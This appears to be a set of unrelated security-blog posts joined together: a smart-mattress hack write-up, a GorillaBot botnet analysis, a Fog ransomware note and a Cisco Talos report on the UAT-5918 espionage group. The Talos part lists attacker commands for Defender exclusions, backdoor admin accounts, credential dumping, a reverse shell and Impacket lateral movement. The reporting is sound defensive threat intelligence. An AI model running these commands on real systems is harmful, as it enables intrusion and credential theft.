For a while after we wrote about hacking a bicycle, it seemed it couldn’t be beat as the most unlikely hack target ever. However, developers’ imagination seems to know no bounds — and hackers aren’t far behind in their ingenuity…

And so, here’s introducing the internet-connected mattress system — or “Pod” as it’s called — made by the company Eight Sleep, along with several ways it can be hacked as discovered by security researcher Dylan Ayrey.

Smart mattress Pod? What’s that?

Perhaps we should start by explaining what an Eight Sleep Pod is and why someone might want to buy this futuristic piece of tech. The Eight Sleep designers position their product as an “Intelligent Bed Cooling System”. The primary target audience is people with various sleep problems: insomnia, poor sleep quality, snoring, and similar issues that can significantly impact quality of life.

The Pod is made up of a sheet-like “high-tech layer” (“Cover”), and an external unit (“Hub”); optionally there’s also a motorized “Base”. It allows users to adjust the temperature of the bed — heating it up or cooling it down as instructed by the owner. It can do it automatically too — more on this later. There’s a network of tubes with water circulating through them built into it. The external unit connected to this system handles the heating and cooling. The Eight Sleep Pod is divided into two independent zones of a double-bed — each with its own settings. The temperature range is fairly broad: from 12 to 43°C.

But wait: there’s more to it! The Pod has several dozen “clinical-grade sensors” that track users’ sleep quality. It also has vibration motors to wake you up, and sensors for ambient temperature and humidity. The ultimate version — the Pod 4 Ultra — comes with a transformable, electronically-controlled bed base.

It goes without saying that the system connects to the internet. It does this via a Wi-Fi receiver in the Hub. Eight Sleep Pods are configured and controlled almost exclusively via an app. We say “almost”, because the latest (and most expensive) generation — Pod 4 — has pressure-sensitive areas on the sides that you can tap to control certain functions.

Autopilot and sleep by subscription

The main software component of an Eight Sleep Pod is the “Autopilot” system, which uses sensors built into the Cover to collect lots of statistics about the quality and quantity of users’ sleep, and generate detailed reports for them. In addition, Autopilot has a number of other interesting options. For example, the system can detect when the user starts snoring and change the geometry of the Base to fix the problem.

The Pod also has a physical alarm clock that wakes the user by changing the temperature of the bed and turning on vibration. However, the key Autopilot feature (and the one Eight Sleep touts the most) is, well, autopilot mode. What this does is continuously monitor the users’ sleep quality — automatically adjusting the temperature to ensure the deepest and most comfortable sleep possible.

In case you thought this was an Eight Sleep Pod ad, let’s look at this product’s numerous flaws…

To start with, these things are eye-wateringly expensive: retail prices start at $3000, and the top-of-the-line Pod 4 Ultra costs a whopping $4700.

But the outlay doesn’t end there: the user will almost certainly have to pay for a subscription that costs between $200 and $300 per year. In theory, you could choose not to pay it, but without the subscription most of the smart features remain inactive.

Also, like any modern tech company, Eight Sleep constantly collects data about its users. CEO Matteo Franceschetti talks quite openly about this on X:

Smart mattress hack No. 1: developer backdoor

Now let’s shift the focus to why this post was written: hacking this smart-mattress system. Dylan Ayrey, a security researcher, decided to look into Eight Sleep’s security — simply out of curiosity, he said, as Dylan is the happy owner of an Eight Sleep Pod, which helps him with his insomnia.

You might remember Dylan for his other notable investigations, such as the possibility of using phantom corporate accounts uncontrollable by workspace admins, or attacking Google OAuth via abandoned domains.

To begin analyzing the Pod’s security, Ayrey needed a copy of its firmware. Security-conscious vendors don’t just give their firmware away, so trying to find a copy often becomes a quest unto itself. Not so with Eight Sleep. The update server lets anyone who follows the link download the firmware for any of the company’s Pod models, no questions asked.

While examining the code, Dylan found a number of noteworthy things, including an API for remote connection via SSH. Given that an Eight Sleep Pod is essentially a computer running Linux (as many other modern devices are), a connection like this allows running arbitrary code remotely on the mattress pad Hub.

Judging by the email address associated with the SSH public key found in the firmware code, all (or at least many) Eight Sleep engineers could have remote access to any Pod.

One could use an SSH connection like this to spy on the Pod’s owner — to find out when they’re sleeping or when they spend the night away from home. It would even be possible to check if there’s one person in bed or two. Having this type of control could also let someone play pranks on the owner by changing the temperature of the Pod, turning the alarm clock on or off, adjusting the geometry of the bed base, and so on.

Nothing like that seems to have happened to Eight Sleep Pod owners yet, but something like it could; theoretical possibilities like this sometimes do materialize. This is what recently happened with Ecovacs robot vacuums: pranksters used vulnerabilities in these devices to harass their owners.

Smart mattress hack No. 2: an AWS key in the firmware

While still looking at the Eight Sleep Pod firmware, Dylan discovered a valid AWS (Amazon Web Services) key in its code — used to continuously upload telemetry to the cloud. Again this is only theoretical, but if the key fell into the wrong hands it could lead to serious violations of user privacy.

For better or for worse, the full truth about the presence of an Amazon key won’t come out. Dylan notified Eight Sleep, and by the time his research was published the key had already been revoked. However, the mere presence of the key within the firmware, where it was accessible to anyone, was clear evidence that user security and privacy were taken lightly.

Dylan further adds that the key could have, at the very least, been used to cause financial damage to the company by sending a large number of meaningless requests to the AWS cloud.

Smart mattress hack No. 3: jailbreaking with the help of an aquarium chiller

Clearly inspired by his earlier findings, Dylan decided to attempt jailbreaking the Pod — that is, detaching it from Eight Sleep’s cloud services. Dylan took a drastic approach: he disconnected the external unit (with all its smart electronics and internet connectivity).

Dylan replaced the Eight Sleep Hub with… a common aquarium chiller. This system, in contrast, doesn’t require an app or a subscription fee, collects no user data, comes without any backdoors, and runs perfectly well without an internet connection. What it does do is effectively adjust the temperature of your bed, and, just as importantly, it costs only $150.

For those who prefer a less radical approach to the issue of Eight Sleep products being tied to the vendor cloud, Free Sleep offers a solution. This is an open-source software suite that allows you to take control of your smart mattress.

Want to know what other unexpected devices have been successfully hacked? Here you go!…

• Hacking a train
• Hacking a capsule hotel
• Hole in the bowl: smart pet feeder springs a leak
• Vulnerabilities in a toy robot permitting snooping. Seriously
• Hacking our boss’s smart home
• Vibrators hacked
• IP camera security: the bad, the ugly, and the evil
• …and many others!

Kaspersky official blog – ​Read More

Editor’s note: The current article is authored by Mohamed Talaat, a cybersecurity researcher and malware analyst. You can find Mohamed on X and LinkedIn. 

In this article, we’re diving into GorillaBot, a newly discovered botnet built on Mirai’s code. It’s been spotted launching hundreds of thousands of attacks across the globe, and it’s got some interesting tricks up its sleeve.  

We’ll walk through how it talks to its command-and-control (C2) servers, how it receives instructions, and the methods it uses to carry out attacks.  

Overview 

“GorillaBot” is a newly discovered Mirai-based botnet that has been actively targeting systems in over 100 countries. According to the NSFOCUS Global Threat Hunting team, the botnet issued more than 300,000 attack commands between September 4 and September 27. 

This malware variant poses a serious cyber threat, affecting a wide range of industries — including telecommunications, financial institutions, and even the education sector — prompting an urgent need for response and mitigation. 

Key Takeaways 

• GorillaBot is a Mirai-based botnet that reuses core logic while adding custom encryption and evasion techniques. 

• It targets a wide range of industries and has launched over 300,000 attacks across more than 100 countries. 

• The botnet uses raw TCP sockets and a custom XTEA-like cipher for secure C2 communication. 

• GorillaBot includes anti-debugging and anti-analysis checks, exiting immediately in containerized or honeypot environments. 

• The malware authenticates to its C2 server using a SHA-256-based token generated from a hardcoded array and server-provided value. 

• Attack commands are encoded and hashed, then passed to a Mirai-style attack_parse function for execution. 

Technical Analysis  

In this section, we will examine the technical details of GorillaBot, focusing on its C2 communication protocol and how it receives information about its targets and the attack methods it’s instructed to use. 

Anti-Debugging  

Before proceeding with its main activity, GorillaBot performs checks to detect the presence of debugging tools. One of its first actions is to read the /proc/self/status file and inspect the TracerPid field. This field indicates whether the process is being traced – a value of 0 means it’s not, while a non-zero value suggests a debugger is attached. 

Learn more about evasion in malware

Another technique that “GorillaBot” uses to detect debuggers is to register a callback function that will pause and then exit upon receiving a SIGTRAP signal. 

Environment check  

GorillaBot is highly selective about the environment it runs in. It first ensures that it is operating on a legitimate target machine rather than inside a honeypot or container. To do this, it performs several checks for system-level artifacts that may not be present in those scenarios. 

The code shows that it initially checks for access to the “/proc” file system – a virtual file system that provides user-space processes with information about the kernel and running processes.  

In a typical Linux environment, the presence of the “/proc” file system is expected. If it’s missing, GorillaBot assumes it is being analyzed in a honeypot and exits immediately. 

GorillaBot uses another check to detect Kubernetes containerization by examining a specific file in the “/proc” directory, namely “/proc/1/cgroup.” It looks for the string “kubepods.” If this string is found, GorillaBot recognizes that it is running in a container and terminates its execution to avoid detection. 

Encryption & Decryption Algorithms  

One of the more intriguing features of this Mirai-based botnet is its use of encryption and decryption techniques to obscure key strings and hide internal configuration data.

Researchers observed that GorillaBot uses a simple Caesar cipher with a shift of 3 to decrypt specific strings. In addition, it employs a custom block cipher – which we’ll examine later in this article – to decrypt more complex internal configurations. These methods help the malware avoid static detection and make reverse engineering more difficult. 

Network Communication  

Initial C2 Communication  

Like many other Mirai-based botnets, GorillaBot uses raw TCP sockets for command-and-control (C2) communication, rather than higher-level protocols like HTTP or HTTPS.  

Learn to analyze malware’s network traffic

The process begins with the malware establishing a connection to its C2 server – the server’s IP address is decrypted at runtime using what appears to be a custom implementation of the XTEA (Extended Tiny Encryption Algorithm).  

The cipher closely resembles TEA or XTEA, employing a 128-bit (16-byte) hardcoded key for both encryption and decryption. 

During each iteration of the algorithm, a delta value is subtracted from the sum. 

The function begins by calculating the length of the provided data. It does this by iterating until it encounters the first NULL character.  

Once the length is known, it proceeds to pack the key. Since the key is given as a serialized sequence of bytes, it must be organized into an array of four 32-bit words before the function can perform either encryption or decryption. 

After the key is prepared and the data length calculated, the function checks a mode parameter to decide whether to encrypt or decrypt. It then enters a loop to iterate over the data for either process.

GorillaBot authentication mechanism with the C2 server   

After successfully connecting to the C2 server, the malware initiates the authentication process to identify itself to the server.  

This process begins with the malware sending a 1-byte TCP probe packet to the C2 server. In response, the server replies with a 4-byte TCP packet that includes a “magic” 4-byte value. This value is then used to generate the bot ID for the authentication process. 

View analysis in ANY.RUN’s Interactive Sandbox

The process begins with a returned 4-byte magic value, which is combined with a 32-byte encrypted array to generate the bot ID or authentication token.  

A key aspect of this process is the method used to combine the 32-byte array with the 4-byte magic value to create the token.  

The same cipher previously described is applied to decrypt the 32-byte hardcoded array. Once decrypted, the data is copied into a separate buffer and concatenated with the 4-byte magic value. 

The combined data is then hashed using SHA-256 before being sent back to the command and control (C2) server as the identification token. 

In the screenshot below, you can see the generated SHA-256 token, which is created by combining the 4-byte magic value received from the C2 server with the decrypted 32-byte hardcoded array. 

The C2 (Command and Control) communication process continues after the C2 server authenticates the botnet.  

In response, the server sends a packet that appears to be a flag, labeled “01,” to confirm the bot’s authenticity. On the C2 server side, most likely a list of hashes representing botnet IDs, such as SHA-256, is maintained. This list is used to verify the received ID, ensuring that the connection is from a legitimate bot instance rather than an unauthorized source attempting to interact with the C2 infrastructure. 

In the screenshot above, after successfully sending the SHA-256 hash (bot ID), the bot receives a 1-byte response. This response is checked against “01,” which indicates successful authentication. Following this, the bot replies with a 4-byte packet containing the bytes “00 00 00 01.” This is likely the bot acknowledging receipt of the flag packet. 

After, GorillaBot exhibits behavior similar to the original Mirai bot. The malware calculates the length of a provided 32-byte ID buffer and sends this length to the command and control (C2) server. Once the length is successfully sent, the malware transmits the actual ID buffer to the server. 

The code snippet above is taken from the leaked Mirai source and includes a check for the number of arguments. If a second argument is provided, it is copied to “id_buf,” which has a length of exactly 32 bytes.  

This behavior is consistent with that observed in the Mirai-based variant “GorillaBot.” During its initial communication with the command-and-control (C2) server, GorillaBot first sends the length of the buffer, followed by the buffer itself – mirroring the original Mirai implementation. 

The screenshot below summarizes the initial C2 communication, validating the connection to ensure it comes from the intended source. This is crucial so that only authenticated connections receive attack commands. 

Processing Attack Commands  

Once the bot has been authenticated, the next stage in the C2 communication process involves receiving a packet containing attack target information – essentially, instructions to initiate an attack. 

In the example screenshot below, we can see that the first step taken is to read the length of the packet. This confirms the malware’s ability to retrieve data over the socket from the command and control (C2) server.  

After successfully reading the length, the malware proceeds with execution. It reads the expected length of the attack packet, then uses that length to read the corresponding number of bytes from the C2 server, which constitutes the attack packet. 

Attack Command packet structure  

Below is the structure of the received attack packet along with the corresponding packet capture bytes. The time gap in receiving the length of the entire packet (highlighted in red in the capture) and the actual attack packet is minimal. As a result, it may seem as if they were concatenated into one packet and received simultaneously; however, they were actually received separately. 

The packet structure is quite simple. First, there is a 32-byte hash of the entire received packet, referred to as SHA-256 (highlighted in yellow). Following this, the encoded bytes represent the attack command (highlighted in blue), which will be decoded using the same Caesar shift cipher mentioned earlier before being parsed. 

Struct attack_pkt { 

uint16_t expected_pkt_length; 

char encoded_cmd_sha256_hash[SHA256_BLOCK_SIZE]; 

char encoded_cmd[ENCODED_CMD_LENGTH]; 

};

Once the integrity of the encoded attack command is verified, it is decoded and passed to “attack_parse.” This function is responsible for extracting target information, determining the specific attack method, and then handing off control to the appropriate attack function for execution.

The “attack_parse” function closely resembles the original Mirai code, as it processes the provided buffer containing the attack command in a similar manner. Notably, it supports attack commands both with and without options, just like the original Mirai. 

Conclusion 

GorillaBot may not reinvent the wheel, but it’s a strong reminder that old code can still pack a punch when reused in clever ways. By building on Mirai’s foundation and adding its own tweaks to communication, encryption, and evasion techniques, GorillaBot proves that legacy malware lives on and evolves. 

To better understand threats like GorillaBot, the use of malware analysis tools like ANY.RUN’s Interactive Sandbox is important. It lets you dive into live malware behavior: from unpacking encrypted payloads to monitoring C2 communication in real time. 

Curious to see it in action? Try ANY.RUN now to explore malware samples like GorillaBot hands-on and uncover the tactics they use during attacks to strengthen your defenses. 

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request free trial of ANY.RUN’s services → 

Indicators Of Compromise  

Hashes 

b482c95223df33f43b7cfd6a0d95a44cc25698bf752c4e716acbc1ac54195b55 (View sandbox analysis)  

IP Addresses and Domains  

http://193[.]143[.]1[.]70 (C2 server) 

193[.]143[.]1[.]59 (C2 server) 

The post GorillaBot: Technical Analysis and Code Similarities with Mirai appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

We closely monitor changes in the tactics of various cybercriminal groups. Recently, experts from Kaspersky’s Global Research and Analysis Team (GReAT) noted that, after attacks with Fog ransomware, malefactors were publishing not only victim’s data, but also the IP addresses of the attacked computers. We haven’t seen this tactic used by ransomware groups before. In this post, we explain why it’s important and what the purpose of this tactic is.

Who is the Fog ransomware group, and what’s it known for?

Since the ransomware business began to turn into a full-fledged industry, the involved cybercriminals have been splitting themselves up into various specializations. Nowadays, the creators of the ransomware and the people directly behind the attacks are most often not connected in any way — the former develop the malware along with a platform for attacks and subsequent blackmailing, while the latter simply buy access to the code and infrastructure under the ransomware-as-a-service (RaaS) model.

Fog ransomware is one such platform — first noticed in early 2024. The malware is used to attack computers running either Windows or Linux. As is customary among ransomware operators in recent years, the affected data is not only encrypted, but also uploaded to the attackers’ servers, and then, if the victim refuses to pay, published on a TOR site.

Attacks using Fog were carried out against companies working in the fields of education, finance, and recreation. Often, criminals used previously leaked VPN access credentials to penetrate the victim’s infrastructure.

Why they are publishing IP addresses?

Our experts believe that the main purpose of publishing IP addresses is to increase the psychological pressure on victims. Firstly, it increases the traceability and visibility of an incident. The effect of publishing the name of a victim company is less impressive, while the IP address can quickly tell not only who the victim was — but also what exactly was attacked (whether it was a server or a computer in the infrastructure). And the more visible the incident, the more likely it is to face lawsuits over data leakage and fines from regulators. Therefore, it’s more likely that the victim will make a deal and pay the ransom.

In addition, publishing an IP address sends a signal to other criminal groups, which can use the leaked data. They become aware of the address of a knowingly vulnerable machine, and have access to the information downloaded from it, which can be studied and used for further attacks on the infrastructure of the same company. This, in turn, makes the consequences of publication even more unpleasant, and therefore becomes an additional deterrent to ignoring the blackmailer’s demands.

How to stay safe

Since most ransomware attacks still start with employee error, we first recommend periodically raising staff awareness about modern-day cyberthreats (for example, using the online training platform.)

In order not to lose access to critical data, we, as usual, recommend making backups and keeping them in storage isolated from the main network. To prevent the ransomware from running on the company’s computers, it’s necessary that each corporate device with access to the network be equipped with an effective security solution. We also recommend that large companies monitor activity in the infrastructure using an XDR class solution, and, if necessary, involve third-party experts in detection and response activities.

Kaspersky official blog – ​Read More

By Jung soo An, Asheer Malhotra, Brandon White, and Vitor Ventura.

• Cisco Talos discovered a malicious campaign we track under the UAT-5918 umbrella that has been active since at least 2023. 
• UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting. 
• We assess that UAT-5918’s post-compromise activity, tactics, techniques, and procedures (TTPs), and victimology overlaps the most with Volt Typhoon, Flax Typhoon, Earth Estries, and Dalbit intrusions we’ve observed in the past.

---

UAT-5918’s activity cluster

Overview 

Talos assesses with high confidence that UAT-5918 is an advanced persistent threat (APT) group that targets entities in Taiwan to establish long-term persistent access in victim environments. UAT-5918 usually obtains initial access by exploiting N-day vulnerabilities in unpatched web and application servers exposed to the internet. The threat actor will subsequently use a plethora of open-source tools for network reconnaissance to move through the compromised enterprise. 

The activity that we monitored suggests that the post-compromise activity is done manually with the main goal being information theft. Evidently, it also includes deployment of web shells across any discovered sub-domains and internet-accessible servers to open multiple points of entry to the victim organizations. UAT-5918’s intrusions harvest credentials to obtain local and domain level user credentials and the creation of new administrative user accounts to facilitate additional channels of access, such as RDP to endpoints of significance to the threat actor.

Typical tooling used by UAT-5918 includes networking tools such as FRPC, FScan, In-Swor, Earthworm, and Neo-reGeorg. Credential harvesting is accomplished by dumping registry hives, NTDS, and using tools such as Mimikatz and browser credential extractors. These credentials are then used to perform lateral movement via either RDP, WMIC (PowerShell remoting), or Impacket. 

UAT-5918 activity cluster overlapping 

UAT-5918’s tooling and TTPs overlap substantially with several APT groups including Volt Typhoon, Flax Typhoon and Dalbit. 

There is a significant overlap in post-compromise tooling and TTPs with Volt Typhoon, such as using ping and tools like In-Swor for network discovery; gathering system information such as drive and partition; gathering logical drive information such as names, IDs, size, and free spaces; credential dumping from web browser applications; using open-source tools such as frp, Earthworm, and Impacket for establishing control channels; and the absence of custom-made malware. The U.S. government assesses that Volt Typhoon is a PRC state-sponsored actor conducting cyberattacks against U.S. critical infrastructure. 

Multiple tools used in this intrusion also overlap with tooling used by Flax Typhoon in the past, such as the Chopper web shell, Mimikatz, JuicyPotato, Metasploit, WMIC and PowerShell, along with the use of tactics such as relying on RDP and other web shells to persist in the enterprise and WMIC for gathering system information. The U.S. government attributes Flax Typhoon, a Chinese government-sponsored threat actor, to the Integrity Technology Group, a PRC-based company.

Additionally, tooling such as FRP, FScan, In-Swor, and Neo-reGeorg, as well as filepaths and names used by UAT-5918, overlap with those used by Tropic Trooper. Tropic Trooper’s malware suite, specifically Crowdoor Loader and SparrowDoor, overlap with the threat actors known as Famous Sparrow and Earth Estries. We have also observed overlaps in tooling and tactics used in this campaign operated by UAT-5918 and in operations conducted by Earth Estries, including the use of FRP, FScan, Webshells, Impacket, living-off-the-land binaries (LoLBins), etc. Furthermore, we’ve discovered similar tooling between UAT-5918 and Dalbit consisting of port scanners, proxying tools, reverse shells, and reconnaissance TTPs.

It is worth noting that a sub-set of tools UAT-5918 uses such as LaZagne, SNetCracker, PortBrute, NetSpy etc., have not been seen being used by the aforementioned threat actors in public reporting. It is highly likely that this tooling might be exclusively used by UAT-5918 or their usage by other related groups may have been omitted in publicly available disclosures. 

Victimology and targeted verticals 

UAT-5918 also overlaps with the previously mentioned APT groups in terms of targeted geographies and industry verticals, indicating that this threat actor’s operations align with the strategic goals of the aforementioned set of threat actors. 

We have primarily observed targeting of entities in Taiwan by UAT-5918 in industry verticals such as telecommunications, healthcare, information technology, and other critical infrastructure sectors. Similar verticals and geographies have also been targeted by APT groups such as Volt Typhoon, Flax Typhoon, Earth Estries, Tropic Trooper, and Dalbit. 

---

Initial access and reconnaissance 

UAT-5918 typically gains initial access to their victims via exploitation of known vulnerabilities on unpatched servers exposed to the internet. Activity following a successful compromise consists of preliminary reconnaissance to identify users, domains, and gather system information. Typical commands executed on endpoints include: 

ping <IP> 
net user 
systeminfo 
arp –a 
route print 
tasklist 
tasklist -v 
netstat -ano 
whoami 
ipconfig 
query user 
cmd /c dir c:users<username>Desktop 
cmd /c dir c:users<username>Documents 
cmd /c dir c:users<username>Downloads 

 Initial credential reconnaissance is carried out using the cmdkey command: 

cmdkey /list 

The threat actor then proceeds to download and place publicly available red-teaming tools (illustrated in subsequent sections) on endpoints to carry out further actions. In some cases, UAT-5918 also disabled Microsoft Defender’s scanning of their working directories on disk: 

powershell.exe -exec bypass Add-MpPreference -ExclusionPath <working_directory> 
powershell Get-MpPreference 

---

Post-compromise tooling 

UAT-5918’s post-compromise tooling consists of web shells, some of which are publicly available, such as the Chopper web shell, multiple red-teaming and network scanning tools, and credentials harvesters.

Reverse proxies and tunnels 

The actor uses FRP and Neo-reGeorge to establish reverse proxy tunnels for accessing compromised endpoints via attacker controlled remote hosts. The tools are usually downloaded as archives and extracted before execution:

The Earthworm (ew) tool for establishing proxies is also run: 

Port scanning 

FScan is a port and vulnerability scanning tool that can scan ranges of IP addresses and Ports specified by the attackers:

Talos has observed the actor scanning of these ports in particular: 

 21 22 80 81 83 91 135 443 445 888 808 889 5432 8000 8080 54577 11211

The threat actor also relies extensively on the use of In-Swor, a publicly available tool authored and documented by Chinese speaking individuals, for conducting port scans across ranges of IP addresses. A sample command of In-Swor’s use is: 

Run[.]exe -h <ip_range>/24 -nopoc -pwdf pw[.]txt -p 1521,6379 -t 4 

In-Swor was used to scan for the following ports across IP address ranges: 

22		SSH 
80		HTTP 
135		RPC 
445		SMB 
1433		SQL server 
1521		Oracle DBs 
3306		MySQL 
3389		RDP 
4194 		Kubernetes? 
5432 		PostgreSQL 
5900 		VNC 
6379 		Redis 
10248 	    ? 
10250 	    Kubernetes 
10255 	    MongoDB 

In other instances, In-Swor was used to establish proxy channels:

svchost[.]exe proxy -l *:22 -k 9999 
svchost[.]exe proxy -l *:443 -k 9999 
svchost[.]exe proxy -hc -l *:443 -k 99997654  
svchost[.]exe -hc proxy -l *:443 -k 99997654  
svchost[.]exe proxy -l 443 –v 
 
svchost[.]exe -type server -proto tcp -listen :443  
svchost[.]exe -type server -proto http -listen :443  
svchost[.]exe -type server -proto rhttp -listen :443 

In addition to FScan, PortBrute, another password brute forcer for multiple protocols such as FTP, SSH, SMB, MYSQL, MONGODB, etc., was also downloaded and used:

PortBruteWin(5).exe -up <username>:<password> 

Additional network reconnaissance 

The threat actor uses two utilities for monitoring the current connection to the compromised hosts — NirSoft’s CurrPorts utility and TCPView. Both tools are likely used to perform additional network discovery to find accessible hosts to pivot to: 

C:Users<compromised_user>Desktopcports-x64/cports.exe 
C:Users<compromised_user>DesktopTCPViewtcpview64.exe 

The threat actor also uses PowerShell-based scripts to attempt SMB logins to specific endpoints already identified by them:

powershell[.]exe -file C:ProgramDatasmblogin-extra-mini.ps1 

Netspy, another tool authored and documented by Chinese speaking individuals, is a network segmentation discovery tool that UAT-5918 employs occasionally for discovery. The fact that the operator had to check the tool help denotes the lack of automation and the unusual usage of such tool:

netspy[.]exe -h 

Gathering local system information 

The attackers may also gather commands to profile the endpoint and its drives:

wmic diskdrive get partitions /value  
fsutil fsinfo drives  
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace  
wmic logicaldisk get DeviceID,VolumeName,Size,FreeSpace /format:value 

---

Maintaining persistent access to victims 

The threat actor attempts to deploy multiple web shells on systems they find are hosting web applications. The web shells are typically ASP or PHP-based files placed deep inside housekeeping directories such as image directories, user files etc. 

The threat actor uses JuicyPotato’s (a privilege escalation tool) web shell variant that allows JuicyPotato to act as a web shell on the compromised system accepting commands from remote systems to execute:

JuicyPotato is then run to spawn cmd[.]exe to run a reverse shell that allows the threat actor to run arbitrary commands: 

Run.exe -t t -p c:windowssystem32cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 

UAT-5918 will also use PuTTY’s pscp tool to connect to and deliver additional web shells to accessible endpoints (likely servers) within the network:

pscp[.]exe <web_shell> <user>@<IP>:/var/www/html/<web_shell> 

Furthermore, Talos has observed UAT-5918 execute reverse Meterpreter shells to maintain persistent access to the compromised hosts:

C:ProgramDatabind.exe 

C:ProgramDatamicrobind.exe 

C:ProgramDatareverse.exe 

cmd /c C:/ProgramData/microbind.exe 

Backdoored user account creation 

UAT-5918 regularly creates and assigns administrative privileges to user accounts they’ve created on compromised endpoints: 

net user <victimname_username> <password> /add 
net localgroup administrators <username> /add 
net group domain admins <username> /add /domain 

---

Credential extraction 

Credential harvesting is a key tactic in UAT-5918 intrusions, instrumented via the use of tools such as Mimikatz, LaZagne, and browser credential stealers: 

Mimikatz: A commonly used credential extractor tool is run to obtain credentials from the endpoint:

LaZagne: LaZagne is an open-sourced credential extractor: 

C:/ProgramData/LaZagne.exe 
C:/ProgramData/LaZagne.exe -all >> laz.txt 

Registry dumps: The “reg” system command is used to take dumps of the SAM, SECURITY and SYSTEM hives:

Google Chrome information: The adversary also uses a tool called BrowserDataLite, a tool to extract Login information, cookies, and browsing history from web browsers. The extracted information is subsequently accessed via notepad[.]exe: 

BrowserDataLite_x64.exe 
 
C:Windowssystem32NOTEPAD.EXE Chrome_LoginPass.txt 
C:Windowssystem32NOTEPAD.EXE Chrome_Cookies.txt 
C:Windowssystem32NOTEPAD.EXE Chrome_History.txt 

SNETCracker: A .NET-based password cracker (brute forcer) for services such as SSH, RDP, FTP, MySQL, SMPT, Telnet, VNC, etc.: 

Finding strings related to credentials such as: 

findstr /s /i /n /d:C: password *.conf 

---

Pivoting to additional endpoints 

UAT-5918 consistently attempts to gain access to additional endpoints within the enterprise. They will perform network reconnaissance cyclically to discover new endpoints worth pivoting to and make attempts to gain access via RDP or Impacket: 

mstsc.exe -v <hostname> 

Impacket was also used on multiple occasions to pivot into additional endpoints and copy over tools: 

python wmiexec[.]py Administrator:<password>@<IP> -codec big5 1> [][]127[.]0[.]0[.]1ADMIN$__<timestamp> 2>&1 
 
cmd[.]exe /Q /c echo python wmiexec[.]py Administrator:<password>@<IP> -codec big5 ^> \<hostname>C$__output 2^>^&1 > C:WindowsjFcZpIUm[.]bat & C:Windowssystem32cmd[.]exe /Q /c C:WindowsjFcZpIUm[.]bat & del C:WindowsjFcZpIUm[.]bat 
 
cmd[.]exe /Q /c net use [][]<IP>c$ /user:<username> 1> [][]127[.]0[.]0[.]1<share>__ 2>&1 
cmd[.]exe /Q /c dir [][]<IP>c$ 1> [][]127[.]0[.]0[.]1<share>__ 2>&1  
cmd[.]exe /Q /c copy fscan64[.]exe [][]<IP>c$ 1> [][]127[.]0[.]0[.]1<share>__ 2>&1  
cmd[.]exe /Q /c copy [][]<IP>c$<scan_result>.txt 1> [][]127[.]0[.]0[.]1<share>__ 2>&1  
cmd[.]exe /Q /c copy fscan[.]exe [][]<IP>c$ 1> [][]127[.]0[.]0[.]1<share>__ 2>&1  
cmd[.]exe /Q /c copy mimikatz[.]exe [][]<IP>c$ 1> [][]127[.]0[.]0[.]1<share>__ 2>&1 

File collection and staging 

UAT-5918 pivots across endpoints enumerating local and shared drives to find data of interest to the threat actor. This data may include everything that furthers the APT’s strategic and tactical goals and ranges from confidential documents, DB exports and backups to application configuration files. In one instance, the threat actor used the SQLCMD[.]exe utility to create a database backup that could be exfiltrated: 

C:/ProgramData/SQLCMD.EXE -S <target_server_DB> -U <username> -P <password> -Q BACKUP DATABASE <NAME> to disk='<db_backup_location>.bak' 

---

Coverage 

Ways our customers can detect and block this threat are listed below. 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

---

IOCs 

IOCs for this research can also be found at our GitHub repository here. 

6F6F7AA6144A1CFE61AC0A80DB7AD712440BDC5730644E05794876EB8B6A41B4 
BAB01D029556CF6290F6F21FEC5932E13399F93C5FDBCFFD3831006745F0EB83 
F7F6D0AFB300B57C32853D49FF50650F5D1DC7CF8111AA32FF658783C038BFE5 
497A326C6C207C1FB49E4DAD81D051FCF6BCBE047E0D3FE757C298EF8FE99ABA 
F9EB34C34E4A91630F265F12569F70B83FEBA039C861D6BF906B74E7FB308648 
DD832C8E30ED50383495D370836688EE48E95334270CBBCE41109594CB0C9FD1 
F7B52EE613F8D4E55A69F0B93AA9AA5472E453B0C458C8390DB963FF8B0B769C 
B994CBC1B5C905A2B731E47B30718C684521E8EC6AFB601AFECF30EF573E5153 
12D4EFE2B21B5053A3A21B49F25A6A4797DC6E9A80D511F29CA67039BA361F63 
2272925B1E83C7C3AB24BDEB82CE727DB84F5268C70744345CDA41B452C49E84 
71EB5115E8C47FFF1AB0E7ACEBAEA7780223683259A2BB1B8DB1EB3F26878CA4 
E159824448A8E53425B38BD11030AA786C460F956C9D7FC118B212E8CED4087A 
7EF22BFB6B2B2D23FE026BDFD7D2304427B6B62C6F9643EFEDDB4820EBF865AF 
EFC0D2C1E05E106C5C36160E17619A494676DEB136FB877C6D26F3ADF75A5777 
B7690c0fc9ec32e1a54663a2e5581e6260fe9318a565a475ee8a56c0638f38d0 
A774244ea5d759c4044aea75128a977e45fd6d1bb5942d9a8a1c5d7bff7e3db9 
